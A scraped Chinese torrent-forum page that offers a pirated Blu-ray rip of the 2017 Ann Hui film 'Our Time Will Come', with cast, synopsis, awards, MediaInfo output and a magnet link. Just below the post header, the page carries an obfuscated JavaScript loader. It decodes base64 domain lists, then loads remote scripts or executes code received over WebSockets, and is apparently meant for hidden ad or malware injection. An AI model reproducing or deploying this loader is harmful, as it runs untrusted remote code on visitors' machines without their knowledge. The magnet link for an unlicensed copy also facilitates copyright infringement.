明月几时有[国粤语音轨/中文字幕]Our.Time.Will.Come.2017.1080p.BluRay.x264.DTS.2Audio-迅雷下载 14.30GB

版主小s 14天前 235

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x5a\x7a\x72\x64\x63\x78\x64\x57\x4c\x41']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 Our Time Will Come

◎片 名 明月几时有

◎年 代 2017

◎产 地 中国大陆 / 中国香港

◎类 别 剧情 / 历史 / 战争

◎语 言 粤语 / 汉语普通话 / 日语

◎上映日期 2017-06-18(上海电影节) / 2017-07-01(中国大陆)

◎IMDb评分 6.4/10 from 814 users

◎IMDb链接 https://www.imdb.com/title/tt7075594

◎豆瓣评分 6.9/10 from 80690 users

◎豆瓣链接 https://movie.douban.com/subject/26425072/

◎片 长 130分钟

◎导 演 许鞍华 Ann Hui

◎编 剧 何冀平 Jiping He / 许鞍华 Ann Hui

◎主 演 周迅 Xun Zhou

彭于晏 Eddie Peng

霍建华 Wallace Huo

叶德娴 Deanie Ip

郭涛 Tao Guo

春夏 Jessie Li

黄志忠 Zhizhong Huang

蒋雯丽 Wenli Jiang

梁家辉 Tony Leung

王菀之 Ivana Wong

吕良伟 Ray Lui

鲍起静 Hee Ching Paw

李灿森 Sam Lee

梁文道 Man-tao Leung

张兆辉 Siu-Fai Cheung

冯淬帆 Stanley Fung

苑琼丹 King-Tan Yuen

唐宁 Leila Tong

卢巧音 Candy Lo

许鞍华 Ann Hui

永濑正敏 Masatoshi Nagase

森田凉花 Suzuka Morita

廖骏雄 Chun Hung Liao

何华超 Tony Ho

蔡瀚亿 Babyjohn Choi

欧锦棠 Stephen Au

熊欣欣 Xinxin Xiong

吴岱融 Hugo Ng Doi-Yung

叶朗钲 Mike Yip

谭宫柔真 ?àm th? huy?n trang

和泉素行 Izumi Soko

梅达池 Dachi Mei

胡晨曦 Chenxi Hu

蒋祖曼 Joman Chiang

顾定轩 Zeno Koo

◎标 签 香港 | 历史 | 抗日 | 文艺 | 战争 | 剧情 | 2017 | 中国大陆

◎简 介

故事发生在1940年代的香港,妙龄少女方兰(周迅 饰)和母亲(叶德娴 饰)一起过着相依为命的生活,两人将家中的二楼租住给了作家茅盾(郭涛 饰)和其太太孔德沚(蒋雯丽 饰)。方兰十分热爱茅盾的文字,在其中感受到了火热的革命热情和澎湃的民族气节,然而对于身边动荡的时局和紧张的政治氛围,方兰却知之甚少。 刘锦进(彭于晏 饰)是拥有着矫健身手的进步青年,受组织委托,他负责护送滞留在香港的一批重要文人返回大陆,茅盾一家人便在名单之列。在误打误撞之中,方兰被卷入了这一危险的行动之中,并在刘锦进的建议和鼓励之下,加入了革命队伍之中去,母女两人因此被卷入了历史的滚滚洪流之中。

◎获奖情况

第54届台北金马影展(2017)

金马奖 最佳导演(提名) 许鞍华

金马奖 最佳男配角(提名) 梁家辉

金马奖 最佳女配角(提名) 叶德娴

金马奖 最佳原创配乐(提名) 久石让

金马奖 最佳剪辑(提名) 邝志良 / 雪美莲

第37届香港电影金像奖(2018)

最佳电影

最佳导演 许鞍华

最佳编剧(提名) 何冀平

最佳女主角(提名) 周迅

最佳女配角 叶德娴

最佳摄影(提名) 余力为

最佳剪接(提名) 邝志良 / 雪美莲

最佳美术指导 利国林 / 文念中

最佳服装造型设计(提名) 文念中 / 陈宝欣

最佳原创电影音乐 久石让

最佳音响效果(提名) 吴书瑶 / 杜笃之

第20届上海国际电影节(2017)

金爵奖(提名) 许鞍华

第17届中国电影华表奖(2018)

优秀故事片奖

第12届亚洲电影大奖(2018)

最佳导演(提名) 许鞍华

最佳男配角(提名) 彭于晏

最佳剪接(提名) 邝志良 / 雪美莲

最佳原创音乐 久石让

第18届华语电影传媒大奖(2018)

最佳电影

第25届北京大学生电影节(2018)

最佳女演员奖 周迅

评委会大奖(提名)

第4届豆瓣电影年度榜单(2017)

7月最受关注电影(提名)

  1. General

  2. Unique ID : 221551954214558557426965046473578532441 (0xA6AD5AB27B9EE391E2636648E5EC4E59)

  3. Complete name : [email protected]Q.COM.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 14.3 GiB

  7. Duration : 2 h 10 min

  8. Overall bit rate : 15.7 Mb/s

  9. Movie name : Our Time Will Come

  10. Encoded date : UTC 2021-07-12 12:14:18

  11. Writing application : mkvmerge v59.0.0 ('Shining Star') 64-bit

  12. Writing library : libebml v1.4.2 + libmatroska v1.6.4

  13. Cover : Yes

  14. Attachments : cover.jpg


  15. Video

  16. ID : 1

  17. Format : AVC

  18. Format/Info : Advanced Video Codec

  19. Format profile : [email protected]

  20. Format settings : CABAC / 4 Ref Frames

  21. Format settings, CABAC : Yes

  22. Format settings, Reference frames : 4 frames

  23. Codec ID : V_MPEG4/ISO/AVC

  24. Duration : 2 h 10 min

  25. Bit rate : 12.6 Mb/s

  26. Width : 1 920 pixels

  27. Height : 800 pixels

  28. Display aspect ratio : 2.40:1

  29. Frame rate mode : Constant

  30. Frame rate : 24.000 FPS

  31. Color space : YUV

  32. Chroma subsampling : 4:2:0

  33. Bit depth : 8 bits

  34. Scan type : Progressive

  35. Bits/(Pixel*Frame) : 0.342

  36. Stream size : 11.5 GiB (81%)

  37. Writing library : x264 core 164 r3065+55M 280faca t_mod_New [(8 & 10)[email protected] X86_64]

  38. Encoding settings : cabac=1 / ref=4 / deblock=1:-3:-3 / analyse=0x3:0x133 / me=umh / subme=11 / psy=1 / fade_compensate=0.00 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=48 / chroma_me=1 / trellis=2 / 8x8dct=1 / cqm=0 / deadzone=21,11 / fast_pskip=0 / chroma_qp_offset=-3 / threads=24 / lookahead_threads=6 / sliced_threads=0 / nr=0 / decimate=0 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / constrained_intra=0 / fgo=0 / bframes=11 / b_pyramid=2 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=240 / keyint_min=1 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / intra_refresh=0 / rc_lookahead=72 / rc=crf / mbtree=0 / crf=18.0000 / qcomp=0.65 / qpmin=0:0:0 / qpmax=69:69:69 / qpstep=4 / vbv_maxrate=62500 / vbv_bufsize=78125 / crf_max=0.0 / nal_hrd=none / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.40 / pb_ratio=1.30 / aq=3:0.80 / aq-sensitivity=10.00 / aq-factor=1.00:1.00:1.00 / aq2=0 / aq3=0

  39. Default : Yes

  40. Forced : No


  41. Audio #1

  42. ID : 2

  43. Format : DTS

  44. Format/Info : Digital Theater Systems

  45. Codec ID : A_DTS

  46. Duration : 2 h 10 min

  47. Bit rate mode : Constant

  48. Bit rate : 1 510 kb/s

  49. Channel(s) : 6 channels

  50. Channel layout : C L R Ls Rs LFE

  51. Sampling rate : 48.0 kHz

  52. Frame rate : 93.750 FPS (512 SPF)

  53. Bit depth : 24 bits

  54. Compression mode : Lossy

  55. Stream size : 1.38 GiB (10%)

  56. Title : Mandarin

  57. Language : Chinese

  58. Default : Yes

  59. Forced : No


  60. Audio #2

  61. ID : 3

  62. Format : DTS

  63. Format/Info : Digital Theater Systems

  64. Codec ID : A_DTS

  65. Duration : 2 h 10 min

  66. Bit rate mode : Constant

  67. Bit rate : 1 510 kb/s

  68. Channel(s) : 6 channels

  69. Channel layout : C L R Ls Rs LFE

  70. Sampling rate : 48.0 kHz

  71. Frame rate : 93.750 FPS (512 SPF)

  72. Bit depth : 24 bits

  73. Compression mode : Lossy

  74. Stream size : 1.38 GiB (10%)

  75. Title : Cantonese

  76. Language : Chinese

  77. Default : No

  78. Forced : No


  79. Text #1

  80. ID : 4

  81. ID in the original source medium : 4609 (0x1201)

  82. Format : PGS

  83. Muxing mode : zlib

  84. Codec ID : S_HDMV/PGS

  85. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  86. Duration : 2 h 5 min

  87. Bit rate : 20.8 kb/s

  88. Count of elements : 2536

  89. Stream size : 18.7 MiB (0%)

  90. Title : chs

  91. Language : Chinese

  92. Default : Yes

  93. Forced : No

  94. Original source medium : Blu-ray


  95. Text #2

  96. ID : 5

  97. ID in the original source medium : 4608 (0x1200)

  98. Format : PGS

  99. Muxing mode : zlib

  100. Codec ID : S_HDMV/PGS

  101. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  102. Duration : 2 h 4 min

  103. Bit rate : 21.3 kb/s

  104. Count of elements : 2529

  105. Stream size : 19.0 MiB (0%)

  106. Title : cht

  107. Language : Chinese

  108. Default : No

  109. Forced : No

  110. Original source medium : Blu-ray


  111. Text #3

  112. ID : 6

  113. ID in the original source medium : 4610 (0x1202)

  114. Format : PGS

  115. Muxing mode : zlib

  116. Codec ID : S_HDMV/PGS

  117. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  118. Duration : 2 h 4 min

  119. Bit rate : 27.3 kb/s

  120. Count of elements : 2533

  121. Stream size : 24.3 MiB (0%)

  122. Title : eng

  123. Language : English

  124. Default : No

  125. Forced : No

  126. Original source medium : Blu-ray


  127. Menu

  128. 00:00:00.000 : Chapter 01

  129. 00:09:11.041 : Chapter 02

  130. 00:21:07.333 : Chapter 03

  131. 00:32:53.541 : Chapter 04

  132. 00:42:06.583 : Chapter 05

  133. 00:53:43.375 : Chapter 06

  134. 01:03:11.041 : Chapter 07

  135. 01:15:29.791 : Chapter 08

  136. 01:26:50.000 : Chapter 09

  137. 01:36:36.208 : Chapter 10

  138. 01:48:53.125 : Chapter 11

  139. 01:58:01.250 : Chapter 12


TAGS 剧情 历史 战争

磁力链:
  • magnet:?xt=urn:btih:8BB0D277E9CD05357AB9AB254CC4E1B8FC1BF1B3
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回